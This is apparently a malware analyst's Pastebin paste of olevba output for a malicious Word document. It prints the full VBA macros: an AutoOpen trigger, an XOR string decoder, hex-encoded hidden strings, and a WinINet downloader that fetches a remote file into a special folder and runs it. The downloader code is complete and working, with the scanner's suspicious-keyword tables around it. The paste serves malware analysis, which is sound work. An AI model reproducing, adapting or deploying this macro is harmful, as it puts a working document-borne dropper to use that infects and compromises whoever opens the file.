SHARE
TWEET

Malicious Word macro

dynamoo Mar 24th, 2015 354 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- s22c-6~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: s22c-6~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. HLOPHLOP32
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Module4.bas
  27. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module4'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. (empty macro)
  30. -------------------------------------------------------------------------------
  31. VBA MACRO Module11.bas
  32. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module11'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. (empty macro)
  35. -------------------------------------------------------------------------------
  36. VBA MACRO Module1.bas
  37. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module1'
  38. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  39. ' (File name: AddNewSheet.bas)
  40. ' Author: SENOO, Ken
  41. ' LICENSE: CC0
  42. ' (Last update: 2015-03-10T18:38+09:00)
  43.  
  44. Sub AddNewSheet(sheet_name)
  45.  
  46. ' ?????????????????
  47. For Each ws In Worksheets
  48.   If ws.Name = sheet_name Then
  49.     Application.DisplayAlerts = False
  50.     ws.Delete
  51.     Application.DisplayAlerts = True
  52.   End If
  53. Next ws
  54.  
  55. ' ????????????
  56. Sheets.Add(After:=ActiveSheet).Name = sheet_name
  57.  
  58. End Sub
  59. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  60. ANALYSIS:
  61. No suspicious keyword or IOC found.
  62. -------------------------------------------------------------------------------
  63. VBA MACRO UFO.frm
  64. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/UFO'
  65. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  66. (empty macro)
  67. -------------------------------------------------------------------------------
  68. VBA MACRO Class1.cls
  69. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Class1'
  70. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  71. (empty macro)
  72. -------------------------------------------------------------------------------
  73. VBA MACRO Module3.bas
  74. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module3'
  75. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  76. Option Explicit
  77.  
  78.  
  79. Private Const API333333 = 8162
  80. Private Const API33333 As String = "API33333"
  81. Private Const API3333 = 1
  82. Private Const API333 = &H4000000
  83. Public Function API22222(ByVal sURL As String, ByVal sFileName As String) As Boolean
  84.     #If VBA7 And Win64 Then
  85.         Dim API2222 As LongPtr, API3333333 As LongPtr
  86.     #Else
  87.         Dim API2222 As Long, API3333333 As Long
  88.     #End If
  89.     Dim API2 As Long
  90.     Dim API222 As String * API333333, API33333333 As String
  91.     Dim API22 As Integer, dData As Double
  92.     API2222 = API22222222(API33333, API3333, vbNullString, vbNullString, 0)
  93.     If API2222 = 0 Then
  94.         Exit Function
  95.     End If
  96.     API3333333 = API222222(API2222, sURL, vbNullString, 0, API333, 0)
  97.     If API3333333 = 0 Then
  98.         dData = 0
  99.     Else
  100.         API2222222 API3333333, API222, API333333, API2
  101.         API33333333 = API222
  102.         Do While API2 <> 0
  103.             API2222222 API3333333, API222, API333333, API2
  104.             API33333333 = API33333333 + Mid(API222, 1, API2)
  105.         Loop
  106.         dData = Len(API33333333): API22 = FreeFile
  107.         Open sFileName For Binary Access Write Lock Write As #API22
  108.         Put #API22, , API33333333: Close #API22
  109.     End If
  110.     API222222222 API3333333
  111.     API222222222 API2222
  112.     API33333333 = ""
  113.     If dData Then
  114.         API22222 = True
  115.     End If
  116. End Function
  117. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  118. ANALYSIS:
  119. +------------+----------------+-----------------------------------------+
  120. | Type       | Keyword        | Description                             |
  121. +------------+----------------+-----------------------------------------+
  122. | Suspicious | Open           | May open a file                         |
  123. | Suspicious | Write          | May write to a file (if combined with   |
  124. |            |                | Open)                                   |
  125. | Suspicious | Put            | May write to a file (if combined with   |
  126. |            |                | Open)                                   |
  127. | Suspicious | Binary         | May read or write a binary file (if     |
  128. |            |                | combined with Open)                     |
  129. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  130. |            |                | be used to obfuscate strings (option    |
  131. |            |                | --decode to see all)                    |
  132. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  133. |            |                | may be used to obfuscate strings        |
  134. |            |                | (option --decode to see all)            |
  135. +------------+----------------+-----------------------------------------+
  136. -------------------------------------------------------------------------------
  137. VBA MACRO Module2.bas
  138. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module2'
  139. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  140. (empty macro)
  141. -------------------------------------------------------------------------------
  142. VBA MACRO Module5.bas
  143. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module5'
  144. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  145. Private Const X11111111 = "1E25282121630C3D3D21242E5246242223"
  146. Private Const X1111111 = "111D0C0120243E2E7F637863011C283528"
  147. Private Const X111111 = "2539393D77626229222A223F575B2863292862273E622F242363284B57"
  148. Private Const X11111 = "1E2E3F243D3924232A630B245F571E343E392820022F27282E39"
  149. Private Const X1111 = "MMMMMMMMMMMMM32"
  150.  
  151.  
  152.  
  153.  
  154.  
  155.  
  156. Sub HLOPHLOP32()
  157. '* NAPIDPAOJMXNH55
  158. Dim T111111111111111 _
  159. As Long
  160. For T111111111111111 = _
  161. 3 To 10
  162. If Not T111111111111111 = 14 _
  163. Then Exit For
  164. Next T111111111111111
  165. Dim X111
  166. Set X111 = CreateObject _
  167. (STOP7777777777 _
  168. (X1111, X11111))
  169. Dim X11
  170. Const X11ID = 2
  171. Dim T11111111111111 As Integer
  172. For T11111111111111 = 0 To 0
  173. If T11111111111111 = 5 Then End
  174. Next T11111111111111
  175. Set X11 = X111.GetSpecialFolder _
  176. (X11ID)
  177. Dim T1111111111111 As Integer
  178. For T1111111111111 = 0 To 0
  179. If T1111111111111 = 5 Then End
  180. Next T1111111111111
  181. X1 = X11 & STOP7777777777 _
  182. (X1111, X1111111)
  183. Dim T111111111111 As Integer
  184. For T111111111111 = 0 To 0
  185. If T111111111111 = 5 Then End
  186. Next T111111111111
  187. Set X111 = CreateObject _
  188. (STOP7777777777 _
  189. (X1111, X11111))
  190. Dim T11111111111 As Integer
  191. For T11111111111 = 0 To 0
  192. If T11111111111 = 5 Then End
  193. Next T11111111111
  194. If X111.FileExists _
  195. (X1) Then
  196. X111. _
  197. DeleteFile X1
  198. End If
  199. If API22222(STOP7777777777 _
  200. (X1111, X111111), X1) Then
  201. End If
  202. Set SSSS = Nothing
  203. If X111. _
  204. FileExists _
  205. (X1) Then
  206. End If
  207. Set SASASA = CreateObject _
  208. (STOP7777777777 _
  209. (X1111, X11111111))
  210. SASASA.Open X1
  211. End Sub
  212.  
  213.  
  214.  
  215.  
  216.  
  217.  
  218. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  219. ANALYSIS:
  220. +------------+--------------+-----------------------------------------+
  221. | Type       | Keyword      | Description                             |
  222. +------------+--------------+-----------------------------------------+
  223. | Suspicious | CreateObject | May create an OLE object                |
  224. | Suspicious | Open         | May open a file                         |
  225. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  226. |            |              | be used to obfuscate strings (option    |
  227. |            |              | --decode to see all)                    |
  228. +------------+--------------+-----------------------------------------+
  229. -------------------------------------------------------------------------------
  230. VBA MACRO Module6.bas
  231. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module6'
  232. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  233. Option Explicit
  234.  
  235. #If VBA7 And Win64 Then
  236. Public Declare PtrSafe Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
  237. Public Declare PtrSafe Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
  238. Public Declare PtrSafe Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As LongPtr, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  239. Public Declare PtrSafe Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
  240. #Else
  241. Public Declare Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
  242. Public Declare Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
  243. Public Declare Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As Long, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  244. Public Declare Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
  245. #End If
  246.  
  247.  
  248. Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String
  249.     Dim asasas1 As Long
  250.     Dim asasas1O As String
  251.     Dim asasas10 As Integer
  252.     Dim asasas101 As Integer
  253.     For asasas1 = 1 To (Len(STOP77777777) / 2)
  254.         asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2)))
  255.         asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1))
  256.         asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
  257.     Next asasas1
  258.    STOP7777777777 = asasas1O
  259. End Function
  260. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  261. ANALYSIS:
  262. +------------+----------------+-----------------------------------------+
  263. | Type       | Keyword        | Description                             |
  264. +------------+----------------+-----------------------------------------+
  265. | Suspicious | Lib            | May run code from a DLL                 |
  266. | Suspicious | Chr            | May attempt to obfuscate specific       |
  267. |            |                | strings                                 |
  268. | Suspicious | Xor            | May attempt to obfuscate specific       |
  269. |            |                | strings                                 |
  270. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  271. |            |                | be used to obfuscate strings (option    |
  272. |            |                | --decode to see all)                    |
  273. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  274. |            |                | may be used to obfuscate strings        |
  275. |            |                | (option --decode to see all)            |
  276. | IOC        | wininet.dll    | Executable file name                    |
  277. +------------+----------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top